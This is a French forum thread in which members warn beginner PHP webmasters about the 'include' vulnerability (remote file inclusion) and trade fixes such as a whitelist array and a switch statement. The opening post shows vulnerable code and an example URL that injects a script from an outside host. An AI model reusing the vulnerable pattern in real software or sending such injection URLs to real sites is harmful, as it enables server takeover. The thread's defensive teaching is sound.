Netophonix - Le forum

Un petit univers pour les aventures, series, sketch en mp3 libre sur le net. Informez-vous et discutez sur toutes les sagas mp3.
https://forum.netophonix.com:443/

La Faille Include

https://forum.netophonix.com:443/viewtopic.php?t=248

Page 1 sur 3

La Faille Include

Posté : dim. 11 févr. 2007, 00:07
par D@rk Hell
C'est dernier temp j'ai vu des site en php (de saga mp3 ou pas) qui uttilisait la fonction "include" tant connu...

Mais pour bon nombre de webmaster, cette fonction est aussi associer a la faille "include".
C'est pour sa que j'ai créer ce topic, pour prévenir les débutant en php de ne pas tomber dans le piege qui pourait ravir les Hackers.

Exemple de faille include dans une page PHP:

Code : Tout sélectionner

$page = $_GET['page'];
include($page.".php");
Dans ce cas, le nom du fichier est récupérer puis le fichiet php est inclus et le script est exécuter par le serveur....

L'URL du site serait alors quelque chose comme:
  • http://lesite.com/index.php?page=test
Le fichier test.php est donc inclus...

Mais imaginez qu'un internaute malveillant arrive sur votre site, et découvre que votre site comporte cette faille.... Il n'aurait plus qu'a ecrire ceci
  • http://lesite.com/index.php?page=http://sonsite.com/hacking
Dans ce cas le script sur sont serveur est exécuter sur le votre....Il peut donc exécuter ce qu'il veut sur votre serveur.

voici un exemple de sécuriter que vous pouvez utiiser pour eviter cela:

Code : Tout sélectionner

$page = $_GET['page'];// On récupére le nom de la page

$securiter = array("test","test2"); //on fait un tableau des pages autoriser

for($i=0; ;$i++){  //On créer une boucle de vérification
if( $page == $securiter[$i])break;
if(empty($securiter[$i])) exit("Hacking stoppé"); }

include($page.".php"); //on inclus la page
Avec ça, on est certain que aucune autres pages viendrons perturber le bon fonctionnement de votre site internet

Posté : lun. 12 févr. 2007, 17:47
par Canard Bigleux
Merci de veiller à la sécurité de nos site webs ^^

Posté : mar. 27 févr. 2007, 22:49
par D@rk Hell
de rien...

Posté : sam. 17 mars 2007, 18:46
par Nishiki
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé

Posté : mar. 03 avr. 2007, 18:53
par Cekos
Je suis pas d'accord avec toi, a mon avis un bon vieux switch est plus efficace dans ce genre

Code : Tout sélectionner

$page = $_GET['page']

switch $page
 case "index":
  include('index.php');
  break;

 case "forum":
   include('forum.php');
   break;

Ect ...
Donc si j'ai bien compris tu entre tout les pages autorisé dans la bdd, et après tu vérifie la page demandé
Non pas dans la bdd, mais dans un array

Posté : mar. 03 avr. 2007, 19:03
par Nishiki
Et ben moi je met tout dans la BDD ^^

Posté : dim. 10 juin 2007, 11:23
par mike
Si leur script s'appelle forum.php vous êtes mort quoi ^^
Moi j'utilise la méthode barbare du site du zero

<php>

Posté : dim. 10 juin 2007, 11:33
par Nishiki
Mort non car comment veux-tu qu'il est mit dans ton ftp le meme fichier que toi ?

Si il doivent appeler un fichier extérieur au site c'est sous la forme http://lalal.com/forum.php
Donc aucun risque

Posté : jeu. 16 oct. 2008, 20:36
par karottes
J'hésite entre dire que ça reviens à être atteint de paranoïa aiguë et dire que c'est primordial ...
Sachant que la plupart des gens qui vont sur les sites de sagas mp3 sont :
- soit des buses en informatique
- soit des lammouzes
- soit des programmeurs "propres"
- soit des bonnes gens tout à fait sympathiques

je ne voit pas trop l'intérêt de cette sécurité (malgré tout, plus un site est sécurisé, mieux c'est ...)

Sinon, je te/vous remercie pour cette bienveillance :)

Posté : lun. 02 mars 2009, 19:24
par refiloux
Hmm La faille incluse :smt007

C'est vrais que c'est pas térrible quand on ne veut pas se faire hacké .
Après ceux qui veulent ce faire hacké ( Mazo ) Vous pouvez éssayé ceci, Faut mettre surtout vos compte banquaire pour plus de sensation !


Allez bonne journée !

XD LOL PTDR MDR ... :smt012

[Edit Blast : ça faisait longtemps qu'on avait pas eu un petit boulet.]

Posté : lun. 02 mars 2009, 19:34
par Kak Miortvi Pengvin
Tu m'expliques l'intérêt de ce message? Ce que viennent faire là ces espèces de pseudos-smileys sms? Si c'est de l'humour, ce n'est ni fin ni drôle. Zéro intérêt, zéro contenu, orthographe minimale et sms... La prochaine fois, abstiens toi.

Edition: Raaah... Grillé par Blast pour le bonnet. Tant pis, je lui ai fauché le message de modération. :D

Posté : lun. 02 mars 2009, 19:35
par Verdey
Alors rien que pour rigoler , j'ai essayé , et oui , c'est dangereux. Disons que j'ai réussi a supprimer la page via un script un peu trop bricolé.
Cependant , je rejoins l'avis de Cekos , un bon vieux switch est efficace.

Pour plus de renseignements : HackBBS = Exploit des Failles en PHP sur un site Web
(Je ne suis aucunement responsable de ce que vous trouverez sur ce site)

Posté : lun. 02 mars 2009, 20:25
par Alinor
Bravo Dark, c'est simple et très compréhensible ;)

(pense tout de même à la relecture...)

Posté : lun. 02 mars 2009, 20:32
par Kak Miortvi Pengvin
Alinor, tu parles à un membre qui a posté il y a deux ans...

Posté : lun. 02 mars 2009, 21:00
par refiloux
Ah d'accord c'est pour ça le bonnet ! Message d'humour ...
Heures au format UTC+02:00
Page 1 sur 3

Développé par phpBB® Forum Software © phpBB Limited

Traduit par phpBB-fr.com